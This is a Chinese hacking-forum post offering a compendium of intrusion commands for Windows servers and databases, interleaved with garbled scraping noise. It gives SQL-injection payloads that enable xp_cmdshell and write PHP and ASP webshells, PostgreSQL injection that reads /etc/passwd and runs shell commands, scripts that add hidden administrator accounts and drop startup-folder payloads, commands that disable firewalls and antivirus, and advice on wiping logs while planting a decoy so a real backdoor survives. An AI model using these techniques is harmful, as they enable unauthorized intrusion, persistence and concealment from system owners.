中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

---

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全

3 a( W" E, G6 B' \, q( p+ z7 y1.net user administrator /passwordreq:no
( Y% G, K) w- O这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
2.比较巧妙的建克隆号的步骤
先建一个user的用户
# H+ C, T) w: C2 S) X. R7 s% Z2 I6 ^% F然后导出注册表。然后在计算机管理里删掉
在导入，在添加为管理员组
4 |) g* U, Z6 R3.查radmin密码
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
# m3 e2 H! v1 v* `4 G5 l4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
建立一个"services.exe"的项
. O: V+ \1 c& H  K再在其下面建立(字符串值)
1 H" M4 S; `. j$ o( B7 }6 D# |键值为mu ma的全路径
  z& f8 g, v4 v6 g$ h/ G( C5.runas /user:guest cmd
1 f. a; E5 w! C) Y- f测试用户权限！
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解，输入/?看看吧。（这个是需要管理员权限的哦）建立相同用户通过ntml验证就不必我说了吧？
) i( X, ^0 u% T- |# G0 Y$ S7.入侵后漏洞修补、痕迹清理，后门置放：
基础漏洞必须修补，如SU提权，SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录；你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好，使用查询分析器会留下记录，位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之；IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录，如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个，标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴，如果这个机器只是台普通的肉鸡，放个TXT到管理员桌面吧~提醒他你入侵了，放置了某个后门，添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
1 i4 a  ~( Z$ n, a8 o4 y' M" `* B8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
# V' o' q) Q& S2 F/ R9 Q8 t
for example
# H; h+ w* E( A
5 s9 a( p5 i" z. C5 Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

' C! i5 ~2 y8 y% X* bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'

9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
如果要启用的话就必须把他加到高级用户模式
0 C" I/ t' b5 R# u* h可以直接在注入点那里直接注入
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
( u/ C) [8 U9 Q9 [! ?0 V& k然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
) ]9 Y- v) ^% J! J/ G; G- x或者
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
来恢复cmdshell。
' J  B  x7 L: k- l! L% J
分析器
1 V, K* s7 C& }7 n; m: D, rEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10.xp_cmdshell新的恢复办法
8 c3 Z. `3 g+ y+ bxp_cmdshell新的恢复办法
扩展储存过程被删除以后可以有很简单的办法恢复：
% o# L6 A4 N+ n2 f" p/ t" H删除
drop procedure sp_addextendedproc
4 d/ D; q. `/ p1 v1 ^drop procedure sp_oacreate
. v3 K0 b" ?2 T9 Dexec sp_dropextendedproc 'xp_cmdshell'

恢复
/ {) o# m+ c/ Y4 _+ q- B2 [- Pdbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
  A6 H  @: ?4 e- r
6 i9 L1 m, s0 S( ~: V这样可以直接恢复，不用去管sp_addextendedproc是不是存在
. C3 c. D+ O: p) D& Z9 t5 m7 H6 L. H
-----------------------------
& e+ f* r3 T/ s
删除扩展存储过过程xp_cmdshell的语句:
" j' i' Q( H, r& i" nexec sp_dropextendedproc 'xp_cmdshell'
: w8 H2 Q8 c9 [( E* G# g" ~6 d  _. S
9 y0 K: u4 K/ _  P0 d恢复cmdshell的sql语句
( q% q- Q4 i' i2 Pexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

; {2 k; X8 m  Y
* \* F: [: {) T# |  t( D$ k开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
0 S  {2 ]% ?- U$ `select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
0 Z& u  W. {! V" j. V% F1 Oexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
; @  x" T2 [2 D( @返回结果为1就ok

/ B4 ?1 D4 b2 _' z* G8 n否则上传xplog7.0.dll
9 _# S3 f6 H2 A% r6 N) _* ?exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
+ I' ]0 G0 \% W' w9 [4 B* X% o, V( u
. z% B, f* y! L4 d7 s堵上cmdshell的sql语句
0 l1 ^; r( w# }8 @! s+ F( h. zsp_dropextendedproc "xp_cmdshel
-------------------------
清除3389的登录记录用一条系统自带的命令：
1 Z& J. q8 S9 ]( h4 {reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f

然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
) |- K2 ~7 j+ H1 z' o* X* p在 mysql里查看当前用户的权限
show grants for  

以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql，只可以本地连，对外拒绝连接。以下方法可以帮助你解决这个问题了，下面的语句功能是，建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。

0 ~, o3 V& ?4 s. e
  G7 x: d0 D! H! f# rCreate USER 'itpro'@'%' IDENTIFIED BY '123';
) e. A% Q/ j+ ^! z
/ S$ H5 {7 }- P. ]GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION

MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
9 @! N' r/ ?8 m/ O/ G4 ]  K
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

# s! D: \( v% k5 H& G3 H3 k0 X搞完事记得删除脚印哟。

0 r( e" ?- w  U4 w; U( v3 hDrop USER 'itpro'@'%';

9 b; z/ Z& v, c1 d1 FDrop DATABASE IF EXISTS `itpro` ;
! y/ P. a9 p& k$ r5 W
8 }; h- Z8 f% Q7 ^0 A9 Z5 X当前用户获取system权限
* f& O/ g9 t) }) @sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
! b. D; U8 Z1 Tsc start SuperCMD
' w/ s0 O! J* E% \6 n程序代码
1 \+ q  c6 O8 z" x* Q0 k' F6 N<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
" }' j5 p, Z9 ]) {4 sos="WinNT://"&wsnetwork.ComputerName
( ~* r/ w* H' Z# ^1 p6 q1 @0 hSet ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
" \0 m7 K( @0 w) n! kSet od=ob.Create("user","nosec")
0 @# W$ s+ l  `' `3 e8 dod.SetPassword "123456abc!@#"
- g% _# f7 ]6 X# p$ iod.SetInfo
. D* W' h3 C8 d6 fSet of=GetObject(os&"/nosec",user)
* u* D" ^! b* o0 Ioe.add os&"/nosec"
</Script>
( Y! v( \7 V+ _- e0 `* J; {<script language=javascript>window.close();</script>

/ \6 N) b! g: t

) f* D+ y* r" @: w% g' d
9 R* k7 M7 y! q9 j% g突破验证码限制入后台拿shell
程序代码
REGEDIT4
( m6 O& U! Q2 R# H, C" K$ ?[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
8 |1 x+ e9 x% ~$ C1 j! \! `"BlockXBM"=dword:00000000
2 V( R" D: t4 U0 M
/ v5 O2 O3 R) z1 i! S; Q9 \保存为code.reg，导入注册表，重器IE
就可以了
union写马
3 C4 t$ t8 [4 t2 \程序代码
! J& ~4 ~. C9 }3 W2 u8 {* P8 k! ewww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

应用在dedecms注射漏洞上,无后台写马
  w( C+ a# n2 k, x+ U* Gdedecms后台，无文件管理器，没有outfile权限的时候
, {3 @+ d5 K# y: r/ ?, z1 Y在插件管理-病毒扫描里
写一句话进include/config_hand.php里
0 \$ L( l# Q3 n/ x7 i& W3 p程序代码
>';?><?php @eval($_POST[cmd]);?>
0 D$ e, v/ ?4 c- N7 f9 A, K& \( [
9 d' P4 L: z9 R; n3 f. X( q2 I4 V
9 @7 D* q) f& `& j1 r/ |1 [. x4 @2 C如上格式

oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
7 R% X4 o3 N6 ^* c程序代码
select username,password from dba_users;
6 f( ^( J" G, t) a, q/ x" _3 u

mysql远程连接用户
程序代码

Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
. y5 a. r/ U, j/ z. G0 zMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
5 G5 w( K. O* a4 n; S8 k( W% RMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
' _! I* r- O4 B( X7 d5 f


7 ~' e5 p. S( B9 G7 s& f
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
9 q9 R5 O' a* y4 a8 W* M1 J  V7 N
1.查询终端端口
2 s: Y0 e9 C+ k- ]9 a
0 u7 F2 ]* k, b# g6 @xp&2003：REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

通用：regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
6 {9 l, \2 i: \' N
2.开启XP&2003终端服务
8 W& B2 k( p& {) _- b% P
; }( R) Q, ]/ L" G* {% K
1 |2 }: s0 M( t9 }REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
% R' _' W7 i" Y1 L& V: t& W9 @# i. @
9 ]4 v' @- h) f- ~( g5 N4 q: ?
. o' b5 x6 G$ C7 ^REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
1 h; \0 K  ?  Z, F
5 h/ e* y* O2 `/ {3.更改终端端口为20008(0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
8 K% M6 o2 ]( p$ z+ c9 y
2 S2 p1 U) b1 q0 |! mREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
3 i6 R8 e) V  F7 `
3 f% b, x# P# R4 B7 ?- ^2 j1 c4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
) \  ~# A) P. v$ q/ o- G
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
, ]- L/ o  z2 z
+ n8 E& g4 ~# z: x5 d
6 S# S& M: }  G2 G  K1 @# b5.开启Win2000的终端，端口为3389(需重启)
( b% r0 Y3 ~# d3 t; b! R
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
: K5 Y0 w$ V& j9 P* k5 vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
8 |- j4 W: \" s& techo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
! \0 a& A% U. q1 J& k# wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
) Z* H  s0 |7 M4 e) wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
! H# a  e' u9 Secho "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
# }  W0 h# q& ]  I2 V; }echo "ortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg
- Q& n) X! A, d1 l) S
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)

. j7 p2 Y9 @: {@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
4 f+ u  q/ j, |6 M7 becho [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
6 b4 F  B) b, c+ j# O

- o% F" i% C$ k/ Q! O: a7.禁用TCP/IP端口筛选 (需重启)

4 o: B9 m+ a- c7 x; A# {5 A1 g1 aREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

7 c: f  X( X2 A! u. P8.终端超出最大连接数时可用下面的命令来连接
7 I6 y; L3 T8 L( K
mstsc /v:ip:3389 /console

9.调整NTFS分区权限

cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
; B# a# b6 s% ?& w3 w$ g7 \1 v( D
! O2 \6 W3 q. i+ h8 Kcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)

------------------------------------------------------
8 z6 g% m* M9 ]0 m% A1 `, f$ ~+ e3389.vbs
+ j" Q/ d5 i1 V9 pOn Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
* `+ s4 ]0 ^5 ~5 [) B1 S/ wstrComputer = "."
5 g$ ]+ P( D( P7 D) M2 ^Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
% ?# d! B0 }# _1 JstrComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
# G  \8 S1 W/ ostrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
( ]3 T: h7 p3 Z, u8 W% w$ E9 o3 astrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
4 X9 {6 C: }8 b& @strValueName = "fDenyTSConnections"
: q9 V5 ~% F' z. u) b0 Y" ldwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
2 ]' S& {! B) E0 FstrValueName = "ortNumber"
3 I" \! y7 f9 y' d8 f9 idwValue = 3389
/ ]# _4 J) _6 }; y9 h  u- v& Noreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
$ \2 B( p3 |; AstrValueName = "ortNumber"
- i: m4 p! ]9 c% P1 c. x" _( h0 ]dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
1 `+ s9 t' ?! R0 R4 \R.run("Shutdown.exe -f -r -t 0")

删除awgina.dll的注册表键值
0 l" H. b3 n* u, a$ n* D: y程序代码

( {2 I0 }2 L7 H0 preg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

/ U9 K0 b* a7 P4 X/ ^
) b1 H( _: c" A
4 s8 D0 d4 l- u8 N
程序代码
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
* O6 n5 `- m7 A! |
设置为1，关闭LM Hash

数据库安全:入侵Oracle数据库常用操作命令
最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。
8 \# O1 F' s- I1 D$ E) u1 Y1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。
9 G9 [5 a4 Z) Y; p/ Z3 E) F# N2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
3、SQL>connect / as sysdba ;（as sysoper）或
connect internal/oracle AS SYSDBA ;(scott/tiger)
; C4 e1 l* V1 Tconn sys/change_on_install as sysdba;
' @9 t1 b9 k# C6 C4、SQL>startup; 启动数据库实例
5、查看当前的所有数据库: select * from v$database;
select name from v$database;
$ Q* t3 @2 X: X/ @6、desc v$databases; 查看数据库结构字段
/ X$ ?6 K6 J' q" a( t7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
SQL>select * from V_$PWFILE_USERS;
Show user;查看当前数据库连接用户
, U' \" o) j. ^# r) c9 ]8、进入test数据库：database test;
9、查看所有的数据库实例：select * from v$instance；
' k9 M7 n7 @" Q/ M! a% n/ y+ }如：ora9i
10、查看当前库的所有数据表：
SQL> select TABLE_NAME from all_tables;
# i) }( V( w( {' e$ \+ l# A4 h4 yselect * from all_tables;
! U6 m5 A! Y1 l  R# TSQL> select table_name from all_tables where table_name like '%u%';
$ y# ^9 O6 n/ G- H( s* nTABLE_NAME
------------------------------
/ w8 t/ O% w6 c( h1 W! K_default_auditing_options_
11、查看表结构：desc all_tables;
12、显示CQI.T_BBS_XUSER的所有字段结构：
& V( h* |8 e4 M" Idesc CQI.T_BBS_XUSER;
& |& s8 V2 E' \! f1 f" ~: O13、获得CQI.T_BBS_XUSER表中的记录：
6 r7 b2 V: U# D& Kselect * from CQI.T_BBS_XUSER;
14、增加数据库用户：(test11/test)
! f! i0 P3 P) W8 u8 u+ L( Y. p/ icreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
' T  u- z' L2 L# `$ a1 e6 o15、用户授权:
grant connect,resource,dba to test11;
grant sysdba to test11;
% i3 h- q2 {8 ?) rcommit;
4 T( b% u3 {0 O( i) @16、更改数据库用户的密码：(将sys与system的密码改为test.)
alter user sys indentified by test;
alter user system indentified by test;
  F  _( n! X: k
applicationContext-util.xml
applicationContext.xml
/ w8 T, |, m4 ]/ c- pstruts-config.xml
web.xml
( t4 a7 F1 ~6 q% Zserver.xml
tomcat-users.xml
# r% g( C* D! @7 M9 _6 k0 Thibernate.cfg.xml
database_pool_config.xml
% m$ ], |& b: y9 |
; s5 E; s) b1 o8 h, H6 Q1 f
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
\WEB-INF\struts-config.xml  文件目录结构
" \$ M  ]) B* I6 ^, u/ I
9 R, `  ~. [& Y6 zspring.properties 里边包含hibernate.cfg.xml的名称


C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

! s8 |1 X8 T$ {如果都找不到  那就看看class文件吧。。
* C! d2 P9 ^  M0 |5 @0 c1 e- {# |
测试1：
" W# K3 e: {. C# V# Y/ i# FSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

) i3 N* u2 z- `; O: w测试2：
6 W, o( P8 ~+ j) X& x1 Y- g* s. ^
1 O% K: y: C' j! _! q+ Pcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
1 p. V( U! }! [: M  {* Q2 u5 g
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
* K& K; W/ f* F" }
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

查看虚拟机中的共享文件：
4 \5 I# p7 K% _5 g6 |, K( e在虚拟机中的cmd中执行
" ~/ ~; S0 @& m\\.host\Shared Folders

+ C1 }/ r, n7 Ucmdshell下找终端的技巧
  v! I* ?( Y4 Q8 D找终端：
: E8 `2 J$ {+ t6 G* a2 O+ Q第一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!
2 _* Q7 U$ T! h9 M( V; x　　 而终端所对应的服务名为：TermService
# C' A/ w% }1 ~4 K* M第二步：用netstat -ano命令，列出所有端口对应的PID值!
　　 找到PID值所对应的端口
9 Z5 w- c, s! K2 d+ d
8 G: a& J4 e+ m5 u  Z查询sql server 2005中的密码hash
% N4 d1 m/ y$ K+ o% c: q7 gSELECT password_hash FROM sys.sql_logins where name='sa'
. l1 I, O% p; ~8 i: Y, X, g5 XSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
access中导出shell

7 W! u8 K* t) W( O4 D$ Q中文版本操作系统中针对mysql添加用户完整代码：

use test;
; i) R' p# d% P, Screate table a (cmd text);
( `% t; g+ }9 e. y$ k+ U3 J5 \insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
+ k! b' ^/ O3 T% zinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
: B( V/ B1 v; C  j+ J3 Y' j2 |select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
. G: I* _% j# ]drop table a;
/ V! p" [( i* g2 Q# s1 q
7 U7 E% _4 g# v& l' X英文版本：

4 B" X6 ~. I0 w) b, fuse test;
create table a (cmd text);
1 @9 a! O" {  F, n" m+ Z1 d4 _insert into a values ("set wshshell=createobject (""wscript.shell"") " );
. ~% p( |% ]. T% O  G. O5 t9 finsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
& i" M. E1 F* y, b, ]  H, S9 Y9 M/ qselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;
+ A  Y! x6 o8 S; W6 q9 G- h- \9 ?: j
( X- s) a4 q% c" _create table a (cmd BLOB);
insert into a values （CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
drop table a;
2 ~( H8 p' P3 n8 J* ]: E
记录一下怎么处理变态诺顿
查看诺顿服务的路径
% d3 g* {( R& ?9 N8 Msc qc ccSetMgr
然后设置权限拒绝访问。做绝一点。。
+ o; w7 h  e# `0 J3 Q! d, Hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
' f) ~" b9 O5 p8 Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
4 p( w. M6 W; T; L2 t
然后再重启服务器
0 m1 O/ C7 W1 }iisreset /reboot
' ]. \# Q  ?3 d; M6 u这样就搞定了。。不过完事后。记得恢复权限。。。。
' a) Q- D5 w" |8 {: z! G- I  {cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
/ K* J/ v1 h! `5 o, b! n% f4 Pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
& F  c  X$ n6 @4 u3 @; k. B
  t# p( H5 {) }: A8 I& [) OEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
$ r6 _# G  S" @/ L
postgresql注射的一些东西
如何获得webshell
# f, E$ U( O7 F3 p) h+ e% @http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
如何读文件
; q" v; }& g& F' _# Qhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
5 o- v. x7 K# x" b4 A/ Yhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

z执行命令有两种方式，一种是需要自定义的lic函数支持，一种是用pl/python支持的。
当然，这些的postgresql的数据库版本必须大于8.X
创建一个system的函数：
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
% t$ F$ S1 ^) J+ p4 p
8 h1 N# G, t/ N1 s创建一个输出表：
+ T$ B; ?; z- M/ k7 xCREATE TABLE stdout(id serial, system_out text)
" u& Z) N! e- j
执行shell，输出到输出表内：
SELECT system('uname -a > /tmp/test')
, `/ a5 m# D; w. _8 `
copy 输出的内容到表里面；
COPY stdout(system_out) FROM '/tmp/test'
" X' L3 u4 ?% h# S
从输出表内读取执行后的回显，判断是否执行成功
# a4 H  l+ p1 J8 `2 v
+ K3 F3 g/ @: W5 }* ^* f+ G3 O0 w3 ESELECT system_out FROM stdout
下面是测试例子
6 O- z8 `! D# [+ [, Q/ |( ~" j
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --
8 r/ y  e: _+ S% R  Q; G
. ^6 b7 O5 E% t' W6 \# ?/ ]/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
& G# b& ]) \  P( W. t. Y) N* t
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess    stop the default firewall
8 s% k6 u7 ~, _! S' nnetsh firewall show      show/config default firewall
& Z9 y, ]$ k# ?netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
修改3389端口方法（修改后不易被扫出）
修改服务器端的端口设置,注册表有2个地方需要修改
6 u- M% y4 ]" _8 m8 g" u& a7 I
  O% F* G& g1 U; y' s) H[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
4 g+ ]0 \# P3 P1 ^PortNumber值，默认是3389，修改成所希望的端口，比如6000

第二个地方：
% Y* I1 u# D. v3 r6 @6 ~# f2 A[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　
; K# Q! B% H! w- `( ?; GPortNumber值，默认是3389，修改成所希望的端口，比如6000

0 D+ i5 T  q! A! C2 D现在这样就可以了。重启系统就可以了

8 c3 k4 s! K" s+ s7 p查看3389远程登录的脚本
/ H0 A: [3 w5 M) _' ~保存为一个bat文件
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
% r$ z- V8 z! R  @5 Mnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
: W$ Q# x/ y/ C5 A) S
